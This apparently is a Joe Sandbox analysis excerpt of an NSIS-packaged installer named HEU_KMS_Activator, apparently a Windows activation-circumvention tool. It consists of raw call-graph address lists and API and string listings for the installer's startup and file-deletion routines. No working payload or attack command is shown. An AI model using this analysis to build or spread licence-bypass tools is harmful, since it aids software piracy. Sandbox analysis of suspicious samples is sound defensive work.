3753->3755 3798 405cc1 lstrcpynA 3753->3798 3754->3374 3754->3375 3755->3754 3758 406685 3755->3758 3761 405f2f 2 API calls 3755->3761 3757 406539 3759 406543 lstrcatA 3757->3759 3760 40654d 3757->3760 3764 405eff 9 API calls 3758->3764 3762 406553 3759->3762 3763 405fed 2 API calls 3760->3763 3766 406691 3761->3766 3765 406561 lstrcatA 3762->3765 3767 406569 lstrlenA FindFirstFileA 3762->3767 3763->3762 3764->3754 3765->3767 3766->3754 3768 405fc0 3 API calls 3766->3768 3767->3755 3792 40658e 3767->3792 3769 40669b 3768->3769 3771 405eff 9 API calls 3769->3771 3770 405a5f CharNextA 3770->3792 3772 4066a6 3771->3772 3773 405b11 2 API calls 3772->3773 3774 4066ae RemoveDirectoryA 3773->3774 3777 4066f1 3774->3777 3778 4066ba 3774->3778 3775 40664d FindNextFileA 3779 406665 FindClose 3775->3779 3775->3792 3780 404d10 25 API calls 3777->3780 3778->3758 3781 4066c0 3778->3781 3779->3755 3780->3754 3783 405eff 9 API calls 3781->3783 3782 405eff 9 API calls 3782->3792 3785 4066ca 3783->3785 3784 4064db 66 API calls 3784->3792 3787 404d10 25 API calls 3785->3787 3786 405b11 2 API calls 3788 406602 DeleteFileA 3786->3788 3789 4066d4 3787->3789 3788->3792 3790 406342 38 API calls 3789->3790 3793 4066db 3790->3793 3791 404d10 25 API calls 3791->3775 3792->3770 3792->3775 3792->3782 3792->3784 3792->3786 3792->3791 3796 406614 3792->3796 3799 405cc1 lstrcpynA 3792->3799 3793->3754 3794 405eff 9 API calls 3794->3796 3795 404d10 25 API calls 3795->3796 3796->3775 3796->3794 3796->3795 3797 406342 38 API calls 3796->3797 3797->3796 3798->3757 3799->3792 3800->3528 3801->3551 3802->3557 3804 4060d7 lstrlenA 3803->3804 3805 4060b0 lstrcmpiA 3804->3805 3806 4060df 3804->3806 3805->3806 3807 4060ce CharNextA 3805->3807 3806->3564 3806->3565 3807->3804 3808->3568 4260 405203 4261 405357 4260->4261 4262 40521b 4260->4262 4264 405368 GetDlgItem GetDlgItem 4261->4264 4279 4053a8 4261->4279 4262->4261 4263 405227 4262->4263 4265 405232 SetWindowPos 4263->4265 4266 405245 4263->4266 4267 403be5 19 API calls 4264->4267 4265->4266 4269 405262 4266->4269 4270 40524a ShowWindow 4266->4270 4271 405392 SetClassLongA 4267->4271 4268 403c55 SendMessageA 4300 405414 4268->4300 4274 405284 4269->4274 4275 40526a DestroyWindow 4269->4275 4270->4269 4276 401411 74 API calls 4271->4276 4272 405402 4272->4268 4273 405352 4272->4273 4280 405289 SetWindowLongA 4274->4280 4281 40529a 4274->4281 4278 405661 4275->4278 4276->4279 4277 40138f 74 API calls 4282 4053da 4277->4282 4278->4273 4289 405692 ShowWindow 4278->4289 4279->4272 4279->4277 4280->4273 4285 405311 4281->4285 4286 4052a6 GetDlgItem 4281->4286 4282->4272 4287 4053de SendMessageA 4282->4287 4283 401411 74 API calls 4283->4300 4284 405663 DestroyWindow EndDialog 4284->4278 4288 403c70 8 API calls 4285->4288 4290 4052d6 4286->4290 4291 4052b9 SendMessageA IsWindowEnabled 4286->4291 4287->4273 4288->4273 4289->4273 4293 4052e3 4290->4293 4294 40532a SendMessageA 4290->4294 4295 4052f6 4290->4295 4303 4052db 4290->4303 4291->4273 4291->4290 4292 4060ec 18 API calls 4292->4300 4293->4294 4293->4303 4294->4285 4298 405313 4295->4298 4299 4052fe 4295->4299 4296 403bbe SendMessageA 4296->4285 4297 403be5 19 API calls 4297->4300 4302 401411 74 API calls 4298->4302 4301 401411 74 API calls 4299->4301 4300->4273 4300->4283 4300->4284 4300->4292 4300->4297 4304 403be5 19 API calls 4300->4304 4319 4055a3 DestroyWindow 4300->4319 4301->4303 4302->4303 4303->4285 4303->4296 4305 40548f GetDlgItem 4304->4305 4306 4054a4 4305->4306 4307 4054ad ShowWindow EnableWindow 4305->4307 4306->4307 4328 403c2b EnableWindow 4307->4328 4309 4054d7 EnableWindow 4312 4054eb 4309->4312 4310 4054f0 GetSystemMenu EnableMenuItem SendMessageA 4311 405520 SendMessageA 4310->4311 4310->4312 4311->4312 4312->4310 4329 403c3e SendMessageA 4312->4329 4330 405cc1 lstrcpynA 4312->4330 4315 40554e lstrlenA 4316 4060ec 18 API calls 4315->4316 4317 40555f SetWindowTextA 4316->4317 4318 40138f 74 API calls 4317->4318 4318->4300 4319->4278 4320 4055bd CreateDialogParamA 4319->4320 4320->4278 4321 4055f0 4320->4321 4322 403be5 19 API calls 4321->4322 4323 4055fb GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4322->4323 4324 40138f 74 API calls 4323->4324 4325 405641 4324->4325 4325->4273 4326 405649 ShowWindow 4325->4326 4327 403c55 SendMessageA 4326->4327 4327->4278 4328->4309 4329->4312 4330->4315 4331 402483 4332 401450 18 API calls 4331->4332 4333 40248b 4332->4333 4334 401450 18 API calls 4333->4334 4335 402496 4334->4335 4336 401450 18 API calls 4335->4336 4337 4024a0 4336->4337 4338 401450 18 API calls 4337->4338 4339 4024ab 4338->4339 4340 401450 18 API calls 4339->4340 4341 4024b6 4340->4341 4342 4024cb 4341->4342 4343 401450 18 API calls 4341->4343 4344 405eff 9 API calls 4342->4344 4343->4342 4345 4024f4 CoCreateInstance 4344->4345 4346 402516 4345->4346 4348 4025ca 4345->4348 4347 4025a7 MultiByteToWideChar 4346->4347 4346->4348 4347->4348 4349 402605 4350 401450 18 API calls 4349->4350 4351 40260c 4350->4351 4352 401450 18 API calls 4351->4352 4353 402616 4352->4353 4354 401450 18 API calls 4353->4354 4355 402621 4354->4355 4356 405eff 9 API calls 4355->4356 4357 402633 4356->4357 4358 405f2f 2 API calls 4357->4358 4359 40263c 4358->4359 4360 40264d lstrlenA lstrlenA 4359->4360 4361 404d10 25 API calls 4359->4361 4364 402ef6 4359->4364 4362 404d10 25 API calls 4360->4362 4361->4359 4363 402689 SHFileOperationA 4362->4363 4363->4359 4363->4364 3809 401c86 3810 401450 18 API calls 3809->3810 3811 401c27 3810->3811 3812 401c37 3811->3812 3813 405eff 9 API calls 3811->3813 3814 401c2c 3813->3814 3815 4064db 75 API calls 3814->3815 3815->3812 4365 403e07 4366 403e33 4365->4366 4367 403e17 4365->4367 4369 403e66 4366->4369 4370 403e39 SHGetPathFromIDListA 4366->4370 4376 4059df GetDlgItemTextA 4367->4376 4371 403e50 SendMessageA 4370->4371 4372 403e49 4370->4372 4371->4369 4374 401411 74 API calls 4372->4374 4373 403e24 SendMessageA 4373->4366 4374->4371 4376->4373 4377 401e90 4378 401efb 4377->4378 4380 401e9d 4377->4380 4379 401f2a GlobalAlloc 4378->4379 4382 401eff 4378->4382 4384 4060ec 18 API calls 4379->4384 4383 405eff 9 API calls 4380->4383 4386 401ec8 4380->4386 4381 401f0d 4400 405cc1 lstrcpynA 4381->4400 4382->4381 4385 405eff 9 API calls 4382->4385 4387 401eb9 4383->4387 4389 401f1d 4384->4389 4385->4381 4398 405cc1 lstrcpynA 4386->4398 4393 4060ec 18 API calls 4387->4393 4391 402374 GlobalFree 4389->4391 4392 402c7a 4389->4392 4391->4392 4393->4386 4394 401edd 4399 405cc1 lstrcpynA 4394->4399 4396 401eec 4401 405cc1 lstrcpynA 4396->4401 4398->4394 4399->4396 4400->4389 4401->4392 4402 402191 4403 401450 18 API calls 4402->4403 4404 402198 4403->4404 4405 401450 18 API calls 4404->4405 4406 4021a2 4405->4406 4407 401450 18 API calls 4406->4407 4408 4021ad 4407->4408 4409 401450 18 API calls 4408->4409 4410 4021b7 4409->4410 4411 401429 25 API calls 4410->4411 4412 4021be ShellExecuteA 4411->4412 4413 4021f9 4412->4413 4414 4021e9 4412->4414 4416 405eff 9 API calls 4413->4416 4415 405eff 9 API calls 4414->4415 4415->4413 4417 402210 4416->4417 4418 402a93 4419 401450 18 API calls 4418->4419 4422 401ca6 4419->4422 4421 402ab0 4422->4418 4422->4421 4423 405b31 GetFileAttributesA CreateFileA 4422->4423 4423->4422 4424 402c14 4425 402c1f 4424->4425 4426 4019bf 4424->4426 4427 402c2e FindNextFileA 4425->4427 4427->4426 4428 402c3d 4427->4428 4430 405cc1 lstrcpynA 4428->4430 4430->4426 4431 402d95 4432 402dd5 4431->4432 4433 402d99 4431->4433 4434 401450 18 API calls 4432->4434 4435 405eff 9 API calls 4433->4435 4438 402dc4 4434->4438 4436 402da4 4435->4436 4437 405eff 9 API calls 4436->4437 4439 402db7 4437->4439 4440 402dc9 4439->4440 4441 402dbf 4439->4441 4443 405d7d 7 API calls 4440->4443 4442 403d1a 5 API calls 4441->4442 4442->4438 4443->4438 3816 402218 3817 401450 18 API calls 3816->3817 3818 40221f 3817->3818 3819 405eff 9 API calls 3818->3819 3820 40222c 3819->3820 3821 404d10 25 API calls 3820->3821 3822 402236 3821->3822 3823 40599a 2 API calls 3822->3823 3824 40223c 3823->3824 3826 405eff 9 API calls 3824->3826 3830 402298 CloseHandle 3824->3830 3827 40224e 3826->3827 3829 402255 WaitForSingleObject 3827->3829 3827->3830 3828 402ef6 3831 402269 3829->3831 3830->3828 3832 40227b GetExitCodeProcess 3831->3832 3833 405f8d 2 API calls 3831->3833 3834 40229a 3832->3834 3835 40228d 3832->3835 3836 402270 WaitForSingleObject 3833->3836 3834->3830 3838 405c1f wsprintfA 3835->3838 3836->3831 3838->3830 4444 401c18 4445 401450 18 API calls 4444->4445 4446 401c1f 4445->4446 4447 405eff 9 API calls 4446->4447 4448 401c2c 4447->4448 4449 4064db 75 API calls 4448->4449 4450 401c37 4449->4450 4451 401c98 4452 401450 18 API calls 4451->4452 4453 401ca0 lstrlenA 4452->4453 4455 401ca6 4453->4455 4454 401450 18 API calls 4454->4455 4455->4454 4457 402ab0 4455->4457 4458 405b31 GetFileAttributesA CreateFileA 4455->4458 4458->4455 4459 40299a 4460 40153e 19 API calls 4459->4460 4461 4029a4 4460->4461 4462 401450 18 API calls 4461->4462 4463 4029af 4462->4463 4464 4029ba RegQueryValueExA 4463->4464 4469 4019e4 4463->4469 4465 4029e2 4464->4465 4466 4029dc 4464->4466 4468 40297f RegCloseKey 4465->4468 4465->4469 4466->4465 4470 405c1f wsprintfA 4466->4470 4468->4469 4470->4465 4471 402a1d 4472 40153e 19 API calls 4471->4472 4473 402a27 4472->4473 4474 40143a 18 API calls 4473->4474 4475 402a31 4474->4475 4476 4019e4 4475->4476 4477 402a54 RegEnumValueA 4475->4477 4478 402a48 RegEnumKeyA 4475->4478 4477->4476 4479 402a6d 4477->4479 4478->4479 4479->4476 4480 40297f RegCloseKey 4479->4480 4480->4476 4481 40269d 4482 401ebb 4481->4482 4484 4026a9 4481->4484 4483 4060ec 18 API calls 4482->4483 4485 401ec8 4483->4485 4491 405cc1 lstrcpynA 4485->4491 4487 401edd 4492 405cc1 lstrcpynA 4487->4492 4489 401eec 4493 405cc1 lstrcpynA 4489->4493 4491->4487 4492->4489 4493->4484 4494 40281f 4495 402823 4494->4495 4496 401450 18 API calls 4495->4496 4497 402847 4496->4497 4498 401450 18 API calls 4497->4498 4499 402852 4498->4499 4500 40285b RegCreateKeyExA 4499->4500 4501 40288a 4500->4501 4507 40298a 4500->4507 4502 4028d4 4501->4502 4503 401450 18 API calls 4501->4503 4504 402901 4502->4504 4508 40143a 18 API calls 4502->4508 4506 40289f lstrlenA 4503->4506 4505 40294b RegSetValueExA 4504->4505 4509 403347 48 API calls 4504->4509 4512 402961 RegCloseKey 4505->4512 4513 402966 4505->4513 4510 4028b8 4506->4510 4511 4028ca 4506->4511 4514 4028e5 4508->4514 4515 402919 4509->4515 4516 405eff 9 API calls 4510->4516 4517 405eff 9 API calls 4511->4517 4512->4507 4518 405eff 9 API calls 4513->4518 4519 405eff 9 API calls 4514->4519 4525 405e80 4515->4525 4521 4028c2 4516->4521 4517->4502 4518->4512 4519->4504 4521->4505 4524 405eff 9 API calls 4524->4521 4526 405ea3 4525->4526 4527 405ee6 4526->4527 4530 405eb8 wsprintfA 4526->4530 4528 40292e 4527->4528 4529 405eef lstrcatA 4527->4529 4528->4524 4529->4528 4530->4527 4530->4530 4531 404721 GetDlgItem GetDlgItem 4532 404777 7 API calls 4531->4532 4538 40498e 4531->4538 4533 40481b DeleteObject 4532->4533 4534 40480f SendMessageA 4532->4534 4535 404826 4533->4535 4534->4533 4539 40485d 4535->4539 4540 4060ec 18 API calls 4535->4540 4536 404a72 4537 404b14 4536->4537 4544 404abe SendMessageA 4536->4544 4574 404981 4536->4574 4541 404b29 4537->4541 4542 404b1d SendMessageA 4537->4542 4538->4536 4549 4045f1 5 API calls 4538->4549 4573 4049fd 4538->4573 4543 403be5 19 API calls 4539->4543 4546 40483f SendMessageA SendMessageA 4540->4546 4548 404b52 4541->4548 4554 404b42 4541->4554 4555 404b3b ImageList_Destroy 4541->4555 4542->4541 4550 404871 4543->4550 4552 404ad3 SendMessageA 4544->4552 4544->4574 4545 403c70 8 API calls 4553 404d09 4545->4553 4546->4535 4547 404a64 SendMessageA 4547->4536 4551 404cbb 4548->4551 4563 401411 74 API calls 4548->4563 4578 404b84 4548->4578 4549->4573 4556 403be5 19 API calls 4550->4556 4559 404ccf ShowWindow GetDlgItem ShowWindow 4551->4559 4551->4574 4560 404ae6 4552->4560 4554->4548 4557 404b4b GlobalFree 4554->4557 4555->4554 4561 404882 4556->4561 4557->4548 4558 40494e GetWindowLongA SetWindowLongA 4562 404968 4558->4562 4559->4574 4564 404af7 SendMessageA 4560->4564 4561->4558 4568 4048dd SendMessageA 4561->4568 4569 404948 4561->4569 4571 40490b SendMessageA 4561->4571 4572 40491f SendMessageA 4561->4572 4565 404986 4562->4565 4566 40496e ShowWindow 4562->4566 4563->4578 4564->4537 4583 403c3e SendMessageA 4565->4583 4582 403c3e SendMessageA 4566->4582 4568->4561 4569->4558 4569->4562 4571->4561 4572->4561 4573->4536 4573->4547 4574->4545 4575 404c92 InvalidateRect 4575->4551 4576 404ca8 4575->4576 4579 404170 21 API calls 4576->4579 4577 404bb2 SendMessageA 4581 404bc8 4577->4581 4578->4577 4578->4581 4579->4551 4580 404c40 SendMessageA SendMessageA 4580->4581 4581->4575 4581->4580 4582->4574 4583->4538 4584 403ea1 4585 403eb7 4584->4585 4587 403fc1 4584->4587 4588 403be5 19 API calls 4585->4588 4586 404030 4589 404104 4586->4589 4590 40403a GetDlgItem 4586->4590 4587->4586 4587->4589 4594 404005 GetDlgItem SendMessageA 4587->4594 4591 403f0a 4588->4591 4595 403c70 8 API calls 4589->4595 4592 404050 4590->4592 4593 4040c2 4590->4593 4596 403be5 19 API calls 4591->4596 4592->4593 4601 404076 6 API calls 4592->4601 4593->4589 4597 4040d4 4593->4597 4615 403c2b EnableWindow 4594->4615 4599 4040ff 4595->4599 4600 403f17 CheckDlgButton 4596->4600 4602 4040da SendMessageA 4597->4602 4603 4040eb 4597->4603 4613 403c2b EnableWindow 4600->4613 4601->4593 4602->4603 4603->4599 4606 4040f1 SendMessageA 4603->4606 4604 40402b 4607 403c07 SendMessageA 4604->4607 4606->4599 4607->4586 4608 403f35 GetDlgItem 4614 403c3e SendMessageA 4608->4614 4610 403f4b SendMessageA 4611 403f72 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4610->4611 4612 403f69 GetSysColor 4610->4612 4611->4599 4612->4611 4613->4608 4614->4610 4615->4604 4616 402025 4617 40143a 18 API calls 4616->4617 4618 40202c IsWindow 4617->4618 4619 4018ac 4618->4619 4620 401da7 4621 40143a 18 API calls 4620->4621 4622 401dae 4621->4622 4623 40143a 18 API calls 4622->4623 4624 4018ac 4623->4624 4625 404129 4626 404139 4625->4626 4627 40415f 4625->4627 4628 403be5 19 API calls 4626->4628 4629 403c70 8 API calls 4627->4629 4630 404146 SetDlgItemTextA 4628->4630 4631 40416b 4629->4631 4630->4627 4632 401cac 4633 40143a 18 API calls 4632->4633 4634 401cb4 4633->4634 4635 40143a 18 API calls 4634->4635 4636 401cbf 4635->4636 4637 401450 18 API calls 4636->4637 4638 401cca 4637->4638 4639 401cdc lstrlenA 4638->4639 4644 401d18 4638->4644 4640 401ce7 4639->4640 4640->4644 4645 405cc1 lstrcpynA 4640->4645 4642 401d02 4643 401d0d lstrlenA 4642->4643 4642->4644 4643->4644 4645->4642 4646 406c2d 4647 4067bf 4646->4647 4648 4070eb 4647->4648 4649 406846 GlobalAlloc 4647->4649 4650 40683d GlobalFree 4647->4650 4651 4068b2 GlobalFree 4647->4651 4652 4068bb GlobalAlloc 4647->4652 4649->4647 4649->4648 4650->4649 4651->4652 4652->4647 4652->4648 4653 401d33 4654 401450 18 API calls 4653->4654 4655 401d3b 4654->4655 4656 401450 18 API calls 4655->4656 4657 401d45 4656->4657 4658 401d4c lstrcmpiA 4657->4658 4659 401d5f lstrcmpA 4657->4659 4660 401d52 4658->4660 4659->4660 4661 401c6d 4659->4661 4660->4659 4660->4661 4662 406933 4663 40693a 4662->4663 4666 4067bf 4662->4666 4664 406846 GlobalAlloc 4664->4663 4664->4666 4665 40683d GlobalFree 4665->4664 4666->4663 4666->4664 4666->4665 4666->4666 4667 4068b2 GlobalFree 4666->4667 4668 4068bb GlobalAlloc 4666->4668 4667->4668 4668->4663 4668->4666 4669 4026b4 4684 405cc1 lstrcpynA 4669->4684 4671 4026ca 4685 405cc1 lstrcpynA 4671->4685 4673 4026d6 4674 4026e2 4673->4674 4676 401450 18 API calls 4673->4676 4675 4026f2 4674->4675 4677 401450 18 API calls 4674->4677 4678 401450 18 API calls 4675->4678 4680 402702 4675->4680 4676->4674 4677->4675 4678->4680 4679 401450 18 API calls 4681 40270c 4679->4681 4680->4679 4682 405eff 9 API calls 4681->4682 4683 402724 WritePrivateProfileStringA 4682->4683 4684->4671 4685->4673 4686 402ab7 4687 402abc 4686->4687 4688 402ace 4686->4688 4690 40143a 18 API calls 4687->4690 4689 401450 18 API calls 4688->4689 4691 402ad6 lstrlenA 4689->4691 4692 402ac4 4690->4692 4691->4692 4693 402af5 WriteFile 4692->4693 4694 4019e4 4692->4694 4693->4694 4695 4022b8 4696 401450 18 API calls 4695->4696 4697 4022c0 4696->4697 4698 405f2f 2 API calls 4697->4698 4699 4022c6 4698->4699 4700 4022d7 4699->4700 4702 405c1f wsprintfA 4699->4702 4702->4700 4703 40273a 4704 401450 18 API calls 4703->4704 4705 402749 4704->4705 4706 401450 18 API calls 4705->4706 4707 402754 4706->4707 4708 401450 18 API calls 4707->4708 4709 40275f GetPrivateProfileStringA 4708->4709 4710 401c3c 4711 401450 18 API calls 4710->4711 4712 401c44 4711->4712 4713 405eff 9 API calls 4712->4713 4714 401c54 4713->4714 4715 4059fb MessageBoxIndirectA 4714->4715 4716 4019e4 4715->4716 4724 402c3f 4725 401450 18 API calls 4724->4725 4726 402c47 FindFirstFileA 4725->4726 4727 402c5a 4726->4727 4728 402c6d 4727->4728 4732 405c1f wsprintfA 4727->4732 4733 405cc1 lstrcpynA 4728->4733 4731 402c7a 4732->4728 4733->4731

    Executed Functions

    Function 00403783 Relevance: 56.3, APIs: 22, Strings: 10, Instructions: 272filestringcomCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 147 403783-403818 #17 SetErrorMode OleInitialize call 405f56 SHGetFileInfoA call 405cc1 GetCommandLineA call 405cc1 GetModuleHandleA 154 403824-403839 call 405a5f CharNextA 147->154 155 40381a-40381f 147->155 158 40389e-4038a2 154->158 155->154 159 4038a4 158->159 160 40383b-40383e 158->160 163 4038b7-4038cf GetTempPathA call 40370d 159->163 161 403840-403844 160->161 162 403846-40384e 160->162 161->161 161->162 164 403850-403851 162->164 165 403856-403859 162->165 173 4038d1-4038ef GetWindowsDirectoryA lstrcatA call 40370d 163->173 174 4038f5-40390c DeleteFileA call 403472 163->174 164->165 167 40385b-40385f 165->167 168 40388e-40389b call 405a5f 165->168 171 403861-40386a 167->171 172 40386f-403875 167->172 168->158 183 40389d 168->183 171->172 176 40386c 171->176 178 403885-40388c 172->178 179 403877-403880 172->179 173->174 186 40397a-403989 call 403741 OleUninitialize 173->186 174->186 187 40390e-403914 174->187 176->172 178->168 181 4038a6-4038b2 call 405cc1 178->181 179->178 185 403882 179->185 181->163 183->158 185->178 197 403a74-403a7a 186->197 198 40398f-40399f call 4059fb ExitProcess 186->198 189 403963-40396a call 4056b1 187->189 190 403916-40391f call 405a5f 187->190 195 40396f-403975 call 405d7d 189->195 202 40392a-40392c 190->202 195->186 199 403af7-403aff 197->199 200 403a7c-403a99 call 405f56 * 3 197->200 205 403b01 199->205 206 403b05 199->206 229 403ae3-403aee ExitWindowsEx 200->229 230 403a9b-403a9d 200->230 207 403921-403927 202->207 208 40392e-403938 202->208 205->206 207->208 211 403929 207->211 212 4039a5-4039bf lstrcatA lstrcmpiA 208->212 213 40393a-403947 call 406014 208->213 211->202 212->186 216 4039c1-4039d6 CreateDirectoryA SetCurrentDirectoryA 212->216 213->186 223 403949-40395f call 405cc1 * 2 213->223 219 4039e3-4039fd call 405cc1 216->219 220 4039d8-4039de call 405cc1 216->220 228 403a02-403a1e call 4060ec DeleteFileA 219->228 220->219 223->189 240 403a20-403a30 CopyFileA 228->240 241 403a5f-403a66 228->241 229->199 233 403af0-403af2 call 401411 229->233 230->229 234 403a9f-403aa1 230->234 233->199 234->229 239 403aa3-403ab5 GetCurrentProcess 234->239 239->229 247 403ab7-403ad9 239->247 240->241 242 403a32-403a52 call 406342 call 4060ec call 40599a 240->242 241->228 244 403a68-403a6f call 406342 241->244 242->241 255 403a54-403a5b CloseHandle 242->255 244->186 247->229 255->241
    APIs
    • #17.COMCTL32 ref: 004037A2
    • SetErrorMode.KERNELBASE(00008001), ref: 004037AD
    • OleInitialize.OLE32(00000000), ref: 004037B4
      • Part of subcall function 00405F56: GetModuleHandleA.KERNEL32(?,?,00000000,004037C6,00000008), ref: 00405F66
      • Part of subcall function 00405F56: LoadLibraryA.KERNELBASE(?,?,00000000,004037C6,00000008), ref: 00405F71
      • Part of subcall function 00405F56: GetProcAddress.KERNEL32(00000000,?), ref: 00405F82
    • SHGetFileInfoA.SHELL32(00408A93,00000000,?,00000160,00000000,00000008), ref: 004037DC
      • Part of subcall function 00405CC1: lstrcpynA.KERNEL32(?,?,00002000,004037F1,004447E0,NSIS Error), ref: 00405CCE
    • GetCommandLineA.KERNEL32(004447E0,NSIS Error), ref: 004037F1
    • GetModuleHandleA.KERNEL32(00000000,00471000,00000000), ref: 00403804
    • CharNextA.USER32(00000000,00471000,00000020), ref: 0040382F
    • GetTempPathA.KERNELBASE(00002000,0047B000,00000000,00000020), ref: 004038C2
    • GetWindowsDirectoryA.KERNEL32(0047B000,00001FFB), ref: 004038D7
    • lstrcatA.KERNEL32(0047B000,\Temp), ref: 004038E3
    • DeleteFileA.KERNELBASE(00479000), ref: 004038FA
    • OleUninitialize.OLE32(00000000), ref: 0040397F
    • ExitProcess.KERNEL32 ref: 0040399F
    • lstrcatA.KERNEL32(0047B000,~nsu.tmp,00471000,00000000,00000000), ref: 004039AB
    • lstrcmpiA.KERNEL32(0047B000,00477000), ref: 004039B7
    • CreateDirectoryA.KERNEL32(0047B000,00000000), ref: 004039C3
    • SetCurrentDirectoryA.KERNEL32(0047B000), ref: 004039CA
    • DeleteFileA.KERNEL32(004289B0,004289B0,?,00449000,?), ref: 00403A14
    • CopyFileA.KERNEL32(0047F000,004289B0,00000001), ref: 00403A28
    • CloseHandle.KERNEL32(00000000,004289B0,004289B0,?,004289B0,00000000), ref: 00403A55
    • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403AAA
    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403AE6
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
    • String ID: /D=$ _?=$"$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
    • API String ID: 2435955865-1845187605
    • Opcode ID: 72c36124f39d23ba37981cfcbd8f5fa2747e063fe3c7f6cacadaf7bad4d5c190
    • Instruction ID: 3adc440307e79391630eee929f1289c887b556818b35536ee5ba50467d4057e6
    • Opcode Fuzzy Hash: 72c36124f39d23ba37981cfcbd8f5fa2747e063fe3c7f6cacadaf7bad4d5c190
    • Instruction Fuzzy Hash: A091C171504745AEEB20AF619D49B6B7EDCEB0130AF04443FF585B62D2CBBC89048B6E
    Function 004064DB Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 185filestringCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 332 4064db-4064f5 call 406014 335 4064f7-406509 DeleteFileA 332->335 336 40650e-406519 332->336 337 4066fa-4066fc 335->337 338 40651b-40651d 336->338 339 40652d-406541 call 405cc1 336->339 340 406523-406527 338->340 341 406678-40667d 338->341 348 406543-40654b lstrcatA 339->348 349 40654d-40654e call 405fed 339->349 340->339 340->341 343 4066f8-4066f9 341->343 344 40667f-406683 341->344 343->337 346 406685-40668a 344->346 347 40668c-406693 call 405f2f 344->347 350 4066e2-4066ef call 405eff 346->350 347->343 360 406695-4066b8 call 405fc0 call 405eff call 405b11 RemoveDirectoryA 347->360 352 406553-406556 348->352 349->352 350->343 355 406561-406567 lstrcatA 352->355 356 406558-40655f 352->356 359 406569-406588 lstrlenA FindFirstFileA 355->359 356->355 356->359 362 40666e-406672 359->362 363 40658e-4065a1 call 405a5f 359->363 380 4066f1-4066f3 call 404d10 360->380 381 4066ba-4066be 360->381 362->341 366 406674 362->366 370 4065a3-4065a7 363->370 371 4065ac-4065af 363->371 366->341 370->371 373 4065a9 370->373 374 4065b1-4065b6 371->374 375 4065ca-4065d8 call 405cc1 371->375 373->371 377 4065bc-4065be 374->377 378 40664d-40665f FindNextFileA 374->378 388 4065da-4065e2 375->388 389 4065ef-40660c call 405eff call 405b11 DeleteFileA 375->389 377->375 383 4065c0-4065c4 377->383 378->363 382 406665-406668 FindClose 378->382 380->343 386 4066c0-4066db call 405eff call 404d10 call 406342 381->386 387 4066dd 381->387 382->362 383->375 383->378 386->343 387->350 388->378 390 4065e4-4065ed call 4064db 388->390 401 406646-406648 call 404d10 389->401 402 40660e-406612 389->402 390->378 401->378 405 406632-406644 call 405eff 402->405 406 406614-406630 call 405eff call 404d10 call 406342 402->406 405->378 406->378
    APIs
    • DeleteFileA.KERNELBASE(?,?,00471000), ref: 004064F8
    • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\*.*,\*.*,C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\*.*,?,771B2EE0,00000000,?,00471000), ref: 00406549
    • lstrcatA.KERNEL32(?,00408514,?,C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\*.*,?,771B2EE0,00000000,?,00471000), ref: 00406567
    • lstrlenA.KERNEL32(?), ref: 0040656A
    • FindFirstFileA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\*.*,?), ref: 0040657C
    • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 00406657
    • FindClose.KERNEL32(?), ref: 00406668
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
